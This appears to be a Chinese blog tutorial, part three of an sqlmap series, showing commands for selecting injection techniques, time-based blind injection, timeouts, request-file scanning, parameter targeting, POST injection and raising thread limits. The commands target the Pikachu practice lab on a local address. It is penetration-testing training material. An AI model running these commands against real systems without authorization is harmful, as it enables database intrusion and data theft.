SQLMAP使用教程(三)实战技巧二

一、–technique 使用指定的注入方式

在一些项目中,难免会遇上网络反应缓慢,idc还有检测sqlmap的能力。作为一个专业的渗透测试人员,必须做到快准狠。
有些SQL注入点只允许时间注入,这时指定SQLMAP的注入类型为T

以下是--technique 参数的值的解释:
B:Boolean-basedblindSQLinjection(布尔型注入)
E:Error-basedSQLinjection(报错型注入)
U:UNIONquerySQLinjection(可联合查询注入)
S:StackedqueriesSQLinjection(可多语句查询注入)
T:Time-basedblindSQLinjection(基于时间延迟注入)
Q:InlineSQLInjection(内联注入)

二、使用基于时间的延时注入

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T 
支持多种注入检测,默认是全部:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT

在这里插入图片描述在这里插入图片描述

三、设置超时时间

--time-out 这个参数是设置超时时间 有得网页响应比较慢,可以使用这个参数来增大访问超时的时间。默认是30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10

四、读取文本进行SQL注入检测

sqlmap -r post.txt

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

五、指定参数进行注入

-p 指定需要测试的参数
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 

使用*进行注入
如果url是伪静态的时 ,可以使用*号表示这是检测的地方;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html

POST注入
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1

六、修改默认最大线程

sqlmap/lib/core/settings.py 
默认最大线程是10 可以设置线程最大为100
MAX_NUMBER_OF_THREADS = 100

在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值